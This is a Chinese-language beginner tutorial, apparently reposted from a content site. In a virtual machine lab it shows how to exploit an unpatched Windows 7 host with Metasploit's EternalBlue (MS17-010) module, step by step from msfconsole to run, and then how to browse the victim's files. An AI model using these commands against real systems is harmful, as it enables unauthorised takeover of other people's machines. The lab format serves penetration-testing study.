一、背景介紹
Metasploit就是一個漏洞框架。它的全稱叫做The Metasploit Framework,簡稱叫做MSF。Metasploit作為全球最受歡迎的工具,不僅僅是因為它的方便性和強大性,更重要的是它的框架。它允許使用者開發自己的漏洞腳本,從而進行測試。Metasploit(msf)究竟威力如何呢?如何利用木馬控制受害者主機呢?接下來讓我們一起學習!
二、資源裝備
1.安裝好 Win7的虛擬機一臺
2.整裝待發的小白一個。
3.安裝好的Kali Linux虛擬機一臺。
三、攻防實戰
3.1 利用Metasploit(msf)滲透框架對目標主機進行攻擊,如下圖所示。
步驟1:啟動Metasploit(msf)滲透框架,如下圖所示。
命令:msfconsole

步驟2:Metasploit(msf)滲透框架啟動成功,如下圖所示。

步驟3:檢索漏洞,如下圖所示。
命令:search 漏洞編號
例子:search ms17-010

步驟4:檢索到有關漏洞的利用模塊如下圖所示。
步驟5:選擇對應的漏洞利用模塊并使用,如下圖所示。
命令:use 漏洞利用模塊名稱
例子:use
exploit/windows/smb/ms17_010_eternalblue

步驟6:查看使用的漏洞模塊需要設置的參數,如下圖所示。。
命令:show option
步驟7:設置攻擊參數,如下圖所示。
命令:set rhosts 受害者主機IP
例子:set rhosts 192.168.78.160

步驟8:查看對應的參數是否設置成功,如下圖所示。
命令:show options

步驟9:運行漏洞利用模塊,如下圖所示。
命令:run

步驟10:如下圖所示,成功拿下目標主機
提示:ETERNALBLUE overwrite completed successfully!

3.2 進入后滲透階段,利用DOS命令控制目標主機,如下圖所示。
步驟1:進入Windows系統的cmd窗口,如下圖所示。

步驟2:利用命令查看受害者主機的文件夾信息,如下圖所示。
命令:dir
切換文件夾目錄:cd 文件夾名
切換盤符:cd 盤符名



本文地址:https://www.www.wuyouwg.com/shougong/135965
本文標題:原來黑客是這樣獲取你計算機管理員權限!「實戰」
版權聲明:本文為原創文章,版權歸 一一奇聞 所有,歡迎分享本文,轉載請保留出處!
本文標題:原來黑客是這樣獲取你計算機管理員權限!「實戰」
版權聲明:本文為原創文章,版權歸 一一奇聞 所有,歡迎分享本文,轉載請保留出處!